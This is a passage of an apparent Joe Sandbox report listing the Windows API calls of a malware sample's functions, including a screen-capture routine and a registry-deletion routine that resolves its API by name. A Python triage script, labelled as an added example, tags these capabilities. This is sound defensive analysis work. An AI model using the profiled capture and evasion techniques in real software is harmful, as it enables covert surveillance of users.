• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00730000,00000000), ref: 007C791C
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007C7935
• GetDesktopWindow.USER32 ref: 007C794E
• GetWindowRect.USER32(00000000), ref: 007C7955
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007C796D
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007C7985
  • Part of subcall function 00732234: GetWindowLongW.USER32(?,000000EB), ref: 00732242
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
• String ID: 0$tooltips_class32
• API String ID: 2429346358-3619404913
• Opcode ID: 9265c8685dcfa10b24002fdc8444d70ea0fa48396d49d46b420859095636334e
• Instruction ID: 3777c174bd4d4e5fad4fc56bdf8f6c37b3828b22cf480f06ffe272bc71a466c1
• Opcode Fuzzy Hash: 9265c8685dcfa10b24002fdc8444d70ea0fa48396d49d46b420859095636334e
• Instruction Fuzzy Hash: 94717BB0104245AFD729CF18CC48F6ABBE9FB89304F04446DF98597261CB79E946CF16
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0073249F: GetWindowLongW.USER32(00000000,000000EB), ref: 007324B0
• DragQueryPoint.SHELL32(?,?), ref: 007C9BA3
  • Part of subcall function 007C80AE: ClientToScreen.USER32(?,?), ref: 007C80D4
  • Part of subcall function 007C80AE: GetWindowRect.USER32(?,?), ref: 007C814A
  • Part of subcall function 007C80AE: PtInRect.USER32(?,?,?), ref: 007C815A
• SendMessageW.USER32(?,000000B0,?,?), ref: 007C9C0C
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007C9C17
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007C9C3A
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 007C9C81
• SendMessageW.USER32(?,000000B0,?,?), ref: 007C9C9A
• SendMessageW.USER32(?,000000B1,?,?), ref: 007C9CB1
• SendMessageW.USER32(?,000000B1,?,?), ref: 007C9CD3
• DragFinish.SHELL32(?), ref: 007C9CDA
• DefDlgProcW.USER32(?,00000233,?,00000000), ref: 007C9DCD
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 221274066-3440237614
• Opcode ID: 8c7df114848d87755e91eb2344aa99e8831853dcda42a070fea09623f47a4b20
• Instruction ID: e365a570724a7ed0e07a78acd6e6a683a54101f3cd74c2935dcc78bc15927b0b
• Opcode Fuzzy Hash: 8c7df114848d87755e91eb2344aa99e8831853dcda42a070fea09623f47a4b20
• Instruction Fuzzy Hash: 79616971108305AFD711EF60DC89EAFBBE8FF88750F40492DF691921A1DB789A49CB52
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,007C66D6,?,?), ref: 007C8FEE
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,007C66D6,?,?,00000000,?), ref: 007C8FFE
• GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,007C66D6,?,?,00000000,?), ref: 007C9009
• CloseHandle.KERNEL32(00000000,?,?,?,?,007C66D6,?,?,00000000,?), ref: 007C9016
• GlobalLock.KERNEL32(00000000,?,?,?,?,007C66D6,?,?,00000000,?), ref: 007C9024
• ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,007C66D6,?,?,00000000,?), ref: 007C9033
• GlobalUnlock.KERNEL32(00000000,?,?,?,?,007C66D6,?,?,00000000,?), ref: 007C903C
• CloseHandle.KERNEL32(00000000,?,?,?,?,007C66D6,?,?,00000000,?), ref: 007C9043
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,007C66D6,?,?,00000000,?), ref: 007C9054
• OleLoadPicture.OLEAUT32(?,00000000,00000000,007D0C04,?), ref: 007C906D
• GlobalFree.KERNEL32(00000000), ref: 007C907D
• GetObjectW.GDI32(00000000,00000018,?), ref: 007C909D
• CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 007C90CD
• DeleteObject.GDI32(00000000), ref: 007C90F5
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007C910B
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
                                                                                                                                                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3840717409-0
                                                                                                                                                                                          • Opcode ID: d5942ba8101d592d2d81de8314468548c8dd5d025b088fd08e466792678fb90e
                                                                                                                                                                                          • Instruction ID: 7013e3a4e61df5cb558c6ec91e30e782312b57bb120a044633b432740c8ef945
                                                                                                                                                                                          • Opcode Fuzzy Hash: d5942ba8101d592d2d81de8314468548c8dd5d025b088fd08e466792678fb90e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 70411675600209EFDB219F65DC8CEAABBB8FB89711F10806CFA05E7260D7389D41CB24
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• VariantInit.OLEAUT32(00000000), ref: 007A1EC1
• VariantCopy.OLEAUT32(?,?), ref: 007A1ECA
• VariantClear.OLEAUT32(?), ref: 007A1ED6
• VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 007A1FBA
• VarR8FromDec.OLEAUT32(?,?), ref: 007A2016
• VariantInit.OLEAUT32(?), ref: 007A20C7
• SysFreeString.OLEAUT32(?), ref: 007A214B
• VariantClear.OLEAUT32(?), ref: 007A2197
• VariantClear.OLEAUT32(?), ref: 007A21A6
• VariantInit.OLEAUT32(00000000), ref: 007A21E2
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
• String ID: %4d%02d%02d%02d%02d%02d$Default
• API String ID: 1234038744-3931177956
• Opcode ID: 3d98d67e2b3ea0e37b94e568dd00dd8adce3e934c3b329d21643417f11650d8b
• Instruction ID: 70194047cfedd8daa8b3788e2735c1e68d0ed301189f313dc00698501564bdfa
• Opcode Fuzzy Hash: 3d98d67e2b3ea0e37b94e568dd00dd8adce3e934c3b329d21643417f11650d8b
• Instruction Fuzzy Hash: 13D14472A04515EFEB249F68C888B79B7B4FF46301F908259FD059B192DB3CAD01DBA1
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
  • Part of subcall function 007BD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007BC10E,?,?), ref: 007BD415
  • Part of subcall function 007BD3F8: _wcslen.LIBCMT ref: 007BD451
  • Part of subcall function 007BD3F8: _wcslen.LIBCMT ref: 007BD4C8
  • Part of subcall function 007BD3F8: _wcslen.LIBCMT ref: 007BD4FE
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007BC154
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007BC1D2
• RegDeleteValueW.ADVAPI32(?,?), ref: 007BC26A
• RegCloseKey.ADVAPI32(?), ref: 007BC2DE
• RegCloseKey.ADVAPI32(?), ref: 007BC2FC
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 007BC352
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007BC364
• RegDeleteKeyW.ADVAPI32(?,?), ref: 007BC382
• FreeLibrary.KERNEL32(00000000), ref: 007BC3E3
• RegCloseKey.ADVAPI32(00000000), ref: 007BC3F4
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 146587525-4033151799
• Opcode ID: e45c6d409258228cb209e18596dc29afa900a4cc1702d4da4bf44a27619ecbfb
• Instruction ID: 6d19fb2e8eed018050b67c477c6ad774cb47ed712da4ddd6e63587bb6ec5d13e
• Opcode Fuzzy Hash: e45c6d409258228cb209e18596dc29afa900a4cc1702d4da4bf44a27619ecbfb
• Instruction Fuzzy Hash: 12C15B74204201EFD725DF18C499F6ABBE1BF84304F54C49CE4558B2A2CB79ED46CB92
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetDC.USER32(00000000), ref: 007B3035
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 007B3045
• CreateCompatibleDC.GDI32(?), ref: 007B3051
• SelectObject.GDI32(00000000,?), ref: 007B305E
• StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 007B30CA
• GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 007B3109
• GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 007B312D
• SelectObject.GDI32(?,?), ref: 007B3135
• DeleteObject.GDI32(?), ref: 007B313E
• DeleteDC.GDI32(?), ref: 007B3145
• ReleaseDC.USER32(00000000,?), ref: 007B3150
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
• Opcode ID: 03b91321912ed592e547d0f442ed244b66b5f9c63355c7949af57110850a7f8a
• Instruction ID: 81716252236265a5c6b674186fc726070157a2a17bb9aa9c4f9603ffc4d12b96
• Opcode Fuzzy Hash: 03b91321912ed592e547d0f442ed244b66b5f9c63355c7949af57110850a7f8a
• Instruction Fuzzy Hash: 7061F375D00219EFCB14CFA8D888EAEBBB6FF48310F208529E555A7210D775A941CFA4
Uniqueness
• Uniqueness Score: -1.00%

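The two listings above are the kind of per-function evidence that has to be triaged across hundreds of such blocks: the GDI chain at 007B3035-007B3150 (GetDC, CreateCompatibleBitmap, StretchBlt with ROP 00CC0020 which is SRCCOPY, then GetDIBits) is a screen capture, and the registry routine at 007BC154-007BC3F4 deletes values and keys while resolving RegDeleteKeyExW through LoadLibraryA/GetProcAddress rather than the import table. The following Python script is an added example and is not part of the Joe Sandbox report or product: it parses the "APIs" bullet format shown on this page (plain bullets, "Part of subcall function" bullets, and LIBCMT bullets without an argument list) and labels each function with the capability chains it contains. The capability sets, the `triage` function and the other names are assumptions made for this example; the sample input is a subset copied from the listings above.

```python
import re

# Added helper for triaging Joe Sandbox "APIs" listings. Not part of the
# Joe Sandbox report; capability sets below are this example's own choice.

# One bullet of an "APIs" listing. Handles the three shapes seen in the report:
#   • GetDIBits.GDI32(?,?,00000000,...), ref: 007B3109
#   • Part of subcall function 007BD3F8: CharUpperBuffW.USER32(?,?), ref: 007BD415
#   • _wcslen.LIBCMT ref: 0073B333
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<callee>[0-9A-F]{8}):\s*)?"
    r"(?P<func>[\w@?$]+)\.(?P<module>[\w.]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# A listing gets a label when every API in the set appears among its direct calls.
CAPABILITIES = {
    "screen_capture": {"GetDC", "CreateCompatibleBitmap", "CreateCompatibleDC",
                       "StretchBlt", "GetDIBits"},
    "registry_cleanup": {"RegOpenKeyExW", "RegDeleteValueW", "RegDeleteKeyW"},
    "dynamic_api_resolution": {"LoadLibraryA", "GetProcAddress"},
}

HEX32 = re.compile(r"[0-9A-F]{8}")


def split_listings(text):
    """Split report text into per-function chunks on the 'APIs' header line."""
    chunks, current = [], []
    for line in text.splitlines():
        if line.strip() == "APIs":
            if current:
                chunks.append(current)
            current = []
        else:
            current.append(line)
    if current:
        chunks.append(current)
    return chunks


def parse_api_listing(lines):
    """Turn bullet lines into dicts; lines that are not API bullets are skipped."""
    calls = []
    for line in lines:
        m = API_LINE.match(line)
        if not m:
            continue
        raw_args = m["args"]
        args = [a.strip() for a in raw_args.split(",")] if raw_args is not None else []
        calls.append({"func": m["func"], "module": m["module"], "args": args,
                      "ref": m["ref"], "subcall": m["callee"]})
    return calls


def resolved_imports(calls):
    """Symbol names passed to GetProcAddress as a literal (not '?' or an address)."""
    names = []
    for c in calls:
        if c["func"] == "GetProcAddress" and len(c["args"]) >= 2:
            sym = c["args"][1]
            if sym and sym != "?" and not HEX32.fullmatch(sym):
                names.append(sym)
    return names


def triage(text):
    """One summary per function listing: ref range, capability labels, resolved imports."""
    results = []
    for lines in split_listings(text):
        # Subcall bullets describe a callee; keeping them would attribute the
        # callee's behaviour to this function, so only direct calls count.
        direct = [c for c in parse_api_listing(lines) if c["subcall"] is None]
        if not direct:
            continue
        seen = {c["func"] for c in direct}
        refs = sorted(int(c["ref"], 16) for c in direct)
        results.append({
            "ref_range": (f"{refs[0]:08X}", f"{refs[-1]:08X}"),
            "capabilities": sorted(n for n, req in CAPABILITIES.items() if req <= seen),
            "resolved_imports": resolved_imports(direct),
            "call_count": len(direct),
        })
    return results


# Constructed sample: a subset of the two listings shown in the report above.
SAMPLE_REPORT = """\
APIs
• GetDC.USER32(00000000), ref: 007B3035
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 007B3045
• CreateCompatibleDC.GDI32(?), ref: 007B3051
• SelectObject.GDI32(00000000,?), ref: 007B305E
• StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 007B30CA
• GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 007B3109
• ReleaseDC.USER32(00000000,?), ref: 007B3150
APIs
  • Part of subcall function 007BD3F8: _wcslen.LIBCMT ref: 007BD451
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007BC1D2
• RegDeleteValueW.ADVAPI32(?,?), ref: 007BC26A
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 007BC352
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007BC364
• RegDeleteKeyW.ADVAPI32(?,?), ref: 007BC382
"""

if __name__ == "__main__":
    for summary in triage(SAMPLE_REPORT):
        print(summary)
```

Run against a full report export, the output is one line per function with its address range, which makes it straightforward to jump to the screenshot routine or the function that resolves APIs by name. Literal symbol names passed to GetProcAddress are pulled out separately because they reveal behaviour (here RegDeleteKeyExW) that never appears in the PE import table.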
APIs
• ___free_lconv_mon.LIBCMT ref: 0076DE21
  • Part of subcall function 0076D9BC: _free.LIBCMT ref: 0076D9D9
  • Part of subcall function 0076D9BC: _free.LIBCMT ref: 0076D9EB
  • Part of subcall function 0076D9BC: _free.LIBCMT ref: 0076D9FD
  • Part of subcall function 0076D9BC: _free.LIBCMT ref: 0076DA0F
  • Part of subcall function 0076D9BC: _free.LIBCMT ref: 0076DA21
  • Part of subcall function 0076D9BC: _free.LIBCMT ref: 0076DA33
  • Part of subcall function 0076D9BC: _free.LIBCMT ref: 0076DA45
  • Part of subcall function 0076D9BC: _free.LIBCMT ref: 0076DA57
  • Part of subcall function 0076D9BC: _free.LIBCMT ref: 0076DA69
  • Part of subcall function 0076D9BC: _free.LIBCMT ref: 0076DA7B
  • Part of subcall function 0076D9BC: _free.LIBCMT ref: 0076DA8D
  • Part of subcall function 0076D9BC: _free.LIBCMT ref: 0076DA9F
  • Part of subcall function 0076D9BC: _free.LIBCMT ref: 0076DAB1
• _free.LIBCMT ref: 0076DE16
  • Part of subcall function 00762D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0076DB51,00801DC4,00000000,00801DC4,00000000,?,0076DB78,00801DC4,00000007,00801DC4,?,0076DF75,00801DC4), ref: 00762D4E
  • Part of subcall function 00762D38: GetLastError.KERNEL32(00801DC4,?,0076DB51,00801DC4,00000000,00801DC4,00000000,?,0076DB78,00801DC4,00000007,00801DC4,?,0076DF75,00801DC4,00801DC4), ref: 00762D60
• _free.LIBCMT ref: 0076DE38
• _free.LIBCMT ref: 0076DE4D
• _free.LIBCMT ref: 0076DE58
• _free.LIBCMT ref: 0076DE7A
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DE8D
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DE9B
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DEA6
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DEDE
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DEE5
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DF02
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DF1A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                                          • Opcode ID: 4f6d07ade34935f51e1493905b4d9b869777fca5b415b7f5d63c43e1cb002e3d
                                                                                                                                                                                          • Instruction ID: 4527ad1af7fef14e22e95c8c944300e7e5ad375d4b6bd9a25e5c9275cb634caa
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f6d07ade34935f51e1493905b4d9b869777fca5b415b7f5d63c43e1cb002e3d
                                                                                                                                                                                          • Instruction Fuzzy Hash: B7314B31B14705DFEB71AA38D849B5A73E9AF21350F144829E85BDB152DF7AAC41CB20
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0073249F: GetWindowLongW.USER32(00000000,000000EB), ref: 007324B0
• GetSystemMetrics.USER32(0000000F), ref: 007CA990
• GetSystemMetrics.USER32(00000011), ref: 007CA9A7
• GetSystemMetrics.USER32(00000004), ref: 007CA9B3
• GetSystemMetrics.USER32(0000000F), ref: 007CA9C9
• MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 007CAC15
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 007CAC33
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 007CAC54
• ShowWindow.USER32(00000003,00000000), ref: 007CAC73
• InvalidateRect.USER32(?,00000000,00000001), ref: 007CAC95
• DefDlgProcW.USER32(?,00000005,?), ref: 007CACBB
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
• String ID: @
• API String ID: 3962739598-2766056989
• Opcode ID: fe40ef01881b4138003870f9b694b89620d63702a303e3e4673d0c853d215d4e
• Instruction ID: 8c9d85bae2844077842cfbd8b245e81e60c44ea5ff7a8707d965e6059565449c
• Opcode Fuzzy Hash: fe40ef01881b4138003870f9b694b89620d63702a303e3e4673d0c853d215d4e
• Instruction Fuzzy Hash: 81B18C71500219EFDF24CF68C989BAE7BB1BF4470AF14806DED449B295D778AD80CB61
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetClassNameW.USER32(?,?,00000400), ref: 007952E6
• GetWindowTextW.USER32(?,?,00000400), ref: 00795328
• _wcslen.LIBCMT ref: 00795339
• CharUpperBuffW.USER32(?,00000000), ref: 00795345
• _wcsstr.LIBVCRUNTIME ref: 0079537A
• GetClassNameW.USER32(00000018,?,00000400), ref: 007953B2
• GetWindowTextW.USER32(?,?,00000400), ref: 007953EB
• GetClassNameW.USER32(00000018,?,00000400), ref: 00795445
• GetClassNameW.USER32(?,?,00000400), ref: 00795477
• GetWindowRect.USER32(?,?), ref: 007954EF
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
• String ID: ThumbnailClass
• API String ID: 1311036022-1241985126
• Opcode ID: 968cb00fbc419e65f3a555a612d44e3579cde6bf893518de28f31ded3a30c28d
• Instruction ID: 58cb989c576f0cdcf832f9c4ec18f24593ba817d8eb7d2daf311096126b3e358
• Opcode Fuzzy Hash: 968cb00fbc419e65f3a555a612d44e3579cde6bf893518de28f31ded3a30c28d
• Instruction Fuzzy Hash: 0991F671104B16EFDF15CF24E895BAAB7AAFF00344F00452DFA8A82191EB39ED55CB91
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0073249F: GetWindowLongW.USER32(00000000,000000EB), ref: 007324B0
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007C97B6
• GetFocus.USER32 ref: 007C97C6
• GetDlgCtrlID.USER32(00000000), ref: 007C97D1
• DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 007C9879
• GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 007C992B
• GetMenuItemCount.USER32(?), ref: 007C9948
• GetMenuItemID.USER32(?,00000000), ref: 007C9958
• GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 007C998A
• GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 007C99CC
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007C99FD
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
• String ID: 0
• API String ID: 1026556194-4108050209
• Opcode ID: 3e23778eb017fb42219a2ccdc6ec2896904035b5db6a7e1f22d9edfc433684aa
• Instruction ID: 11d9efa460fbdcecb9d1f790528431c8d2a8ab33a9f2c14f96b6f66ec795fc1c
• Opcode Fuzzy Hash: 3e23778eb017fb42219a2ccdc6ec2896904035b5db6a7e1f22d9edfc433684aa
• Instruction Fuzzy Hash: AE81AF715043019FD760CF24D888FAB7BE8FB89754F00492DFA9597291DB78E905CBA2
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetMenuItemInfoW.USER32(008029C0,000000FF,00000000,00000030), ref: 0079C973
• SetMenuItemInfoW.USER32(008029C0,00000004,00000000,00000030), ref: 0079C9A8
• Sleep.KERNEL32(000001F4), ref: 0079C9BA
• GetMenuItemCount.USER32(?), ref: 0079CA00
• GetMenuItemID.USER32(?,00000000), ref: 0079CA1D
• GetMenuItemID.USER32(?,-00000001), ref: 0079CA49
• GetMenuItemID.USER32(?,?), ref: 0079CA90
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0079CAD6
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0079CAEB
                                                                                                                                                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0079CB0C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
